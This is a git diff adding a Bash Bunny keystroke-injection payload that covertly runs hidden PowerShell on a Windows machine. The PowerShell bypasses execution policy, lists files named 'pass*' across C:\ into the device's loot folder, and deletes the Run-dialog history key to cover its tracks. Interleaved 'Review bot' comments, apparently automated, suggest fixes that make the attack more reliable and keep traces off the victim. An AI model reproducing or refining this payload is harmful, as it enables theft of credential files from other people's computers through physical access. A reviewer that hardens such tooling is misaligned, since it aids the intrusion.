diff --git a/payloads/library/FileInfoExfil/ducky_script.txt b/payloads/library/FileInfoExfil/ducky_script.txt
new file mode 100644
index 00000000..e29d353a
--- /dev/null
+++ b/payloads/library/FileInfoExfil/ducky_script.txt
@@ -0,0 +1,16 @@
+REM Title: FileInfoExfil
+REM Creator: A_SarcasticGuy
+REM Target: Windows
+REM Version: 1.0
+
+DELAY 500
+
+GUI r
+
+
+DELAY 1000
+
+
+STRING powershell -windowstyle hidden -ExecutionPolicy ByPass ".((gwmi win32_volume -f 'label=''BASHBUNNY''').Name+'payloads\p.ps1')"
+
+ENTER
diff --git a/payloads/library/FileInfoExfil/p.ps1 b/payloads/library/FileInfoExfil/p.ps1
new file mode 100644
index 00000000..81e40d9c
--- /dev/null
+++ b/payloads/library/FileInfoExfil/p.ps1
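Review bot: The STRING line dot-sources `payloads\p.ps1` off whatever `gwmi win32_volume -f 'label=''BASHBUNNY'''` returns, with no check that a volume was found; if the storage half of `ATTACKMODE HID STORAGE` has not enumerated within the 1.5 s the two DELAYs allow, `.Name` is `$null`, the path collapses to the relative `payloads\p.ps1`, and the hidden window presumably just closes with nothing to show for the run. Guarding inside the same one-liner keeps the failure explicit: `STRING powershell -windowstyle hidden -ExecutionPolicy ByPass "$v=(gwmi win32_volume -f 'label=''BASHBUNNY''').Name; if($v){.($v+'payloads\p.ps1')}else{exit 1}"`. The quotes and backslash in this line are typed through the `gb` layout that payload.txt selects, so a target on another layout gets a garbled command; a `REM` noting that dependency next to the STRING would save an operator a silent failure.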
@@ -0,0 +1,36 @@
+#Creator: A_SarcasticGuy
+#Title: FileExfilInfo
+#Target: Windows
+
+#Check if CapsLock key is enabled
+$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')
+
+#If true, toggle CapsLock key, to ensure that the script doesn't fail
+if ($caps -eq $true){
+
+$key = New-Object -ComObject WScript.Shell
+$key.SendKeys('{CapsLock}')
+}
+
+#Get the drive letter
+$n = (gwmi win32_volume -f 'label=''BASHBUNNY''').Name
+
+#Create directory in loot folder to store file
+mkdir $n\loot\Exfil\$env:computername
+
+#Find files beginning with phrase "pass*" in the directory (and sub-directories) of "C:\" ("pass*" and "C:\" are defaults, and can be changed to suit)
+forfiles /P "C:\" /s /m "pass*" -c "cmd /c echo @isdir @fdate @ftime @path @fsize" >> $n\loot\Exfil\$env:computername\$(get-date -f dd-MM-yyy-hh-mm-ss).txt
+
+#Delete registry key to remove run dialog history
+REG delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
+
+Sleep 10
+
+#Eject Bunny when exfil is completed as search time can vary
+$Eject = New-Object -ComObject Shell.Application
+$Eject.NameSpace(17).ParseName($n).InvokeVerb("Eject")
+
+#N.B Bunny will not eject if still in use, and scans can take quite a large amount of time, for example if scanning a full Hard Disk.
+
+#Close Powershell process, should it still remain open
+$host.SetShouldExit(0)
\ No newline at end of file
diff --git a/payloads/library/FileInfoExfil/payload.txt b/payloads/library/FileInfoExfil/payload.txt
new file mode 100644
index 00000000..e7e08bfa
--- /dev/null
+++ b/payloads/library/FileInfoExfil/payload.txt
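Review bot: `[System.Windows.Forms.Control]::IsKeyLocked('CapsLock')` on the first executable line is used without loading its assembly; in a plain powershell.exe host that type is not resolvable until `Add-Type -AssemblyName System.Windows.Forms` has run, so the statement errors, `$caps` stays `$null`, the `-eq $true` test is false and the CapsLock handling the comment promises is silently skipped — put the `Add-Type` line directly above it. `$n` is likewise used unchecked: if the label lookup returns nothing, `mkdir` and the `>>` redirection resolve to `\loot\Exfil\<host>` on the target's current drive, leaving the loot directory and a timestamped results file on the victim rather than on the Bunny; `if (-not $n) { exit 1 }` after the assignment prevents that. The timestamp format `dd-MM-yyy-hh-mm-ss` uses 12-hour `hh` with no AM/PM marker, so a morning and an afternoon run on the same host share a file name (`>>` appends, so nothing is lost, but the two scans are merged); `dd-MM-yyyy-HH-mm-ss` is unambiguous. Note also that `REG delete ... RunMRU /f` removes the whole key rather than the one entry, and that the PowerShell command line itself still lands in process-creation and script-block logs where those are enabled — worth a comment so operators do not read the key deletion as covering tracks.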
@@ -0,0 +1,60 @@
+#Title: FileInfoExfiltrator
+#Author: A_SarcasticGuy
+#Version: 1.0
+#Target: Windows
+#
+#Runs Powershell that calls a .ps1 file to scan (in all subdirectories of path provided) for all files (by default starting on c:/) beginning with a #specific phrase (default "pass*") to then #be outputted to a text file in the loot directory, in a subfolder with the name of the system and with a #file name of the date and time of the scan.
+#
+# Options: Search Directory: Find in p.bat (default c:/)
+# Search criteria: Find in p.bat (default "pass*")
+#
+# Purple LED..................Script Started
+# Yellow LED..................Ducky Script Started
+# Red LED.....................Failed to run Ducky Script, see log file
+#
+# NOTE: p.ps1 MUST be in loot/payloads/ for this to work.
+#
+
+LED B R
+
+ATTACKMODE HID STORAGE
+
+
+
+# Set language
+QUACK SET_LANGUAGE gb
+
+
+# Source bunny_helpers.sh to allow the value fo SWITCH_POSITION to be returned
+source bunny_helpers.sh
+
+
+
+if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then
+
+
+#Call ducky script
+LED R G
+
+
+QUACK ${SWITCH_POSITION}/ducky_script.txt
+
+
+QUACK DELAY 10000
+
+LED R G B
+
+else
+
+
+LED R
+
+
+#Red LED if unable to load script
+echo "Unable to load ducky_script.txt" >> /root/debuglog.txt
+
+
+exit 1
+
+
+fi
diff --git a/payloads/library/FileInfoExfil/readme.md b/payloads/library/FileInfoExfil/readme.md
new file mode 100644
index 00000000..827a61ad
--- /dev/null
+++ b/payloads/library/FileInfoExfil/readme.md
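Review bot: The `# NOTE: p.ps1 MUST be in loot/payloads/` header line contradicts the path the ducky script actually dot-sources — `<BASHBUNNY>\payloads\p.ps1`, i.e. the `/payloads` folder the readme names — and both `Find in p.bat` option lines point at a file this change does not add; suggest `# NOTE: p.ps1 MUST be copied to the udisk's top-level payloads/ folder (it is loaded as <BASHBUNNY>\payloads\p.ps1).` and `Find in p.ps1` in the two option lines. `QUACK DELAY 10000` followed by `LED R G B` lights white after a fixed ten seconds whether or not the PowerShell side ran or finished, so that state only means the ducky script has been typed; a line such as `# White LED: ducky script typed; p.ps1 runs and ejects the Bunny on its own` in the LED legend would stop operators reading it as completion. `QUACK SET_LANGUAGE gb` is the one hard-coded, target-dependent setting in this file and is absent from the Options block, although a layout mismatch garbles the quoted PowerShell one-liner; it deserves an entry there.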
@@ -0,0 +1,27 @@
+## Exfiltrate File Information
+
+Author: @A_SarcasticGuy
+Target: Windows
+Version: Version 1.0
+
+## Description
+
+Exfiltrate file information if they start with a specific passphrase, and once complete the Bunny should be ejected
+
+NOTE: The Bunny will only be ejected when it is not in use, so if the scan is still continuing it will fail to eject
+
+## Configuration
+
+HID STORAGE
+
+## Requirements
+
+p.ps1 file MUST be in /payloads folder.
+
+## STATUS
+
+| LED | Status |
+| ---------------- | ------------------------------------- |
+| Purple | Script Started |
+| Yellow | Ducky Script Started |
+| Red | Failed to find Ducky Script |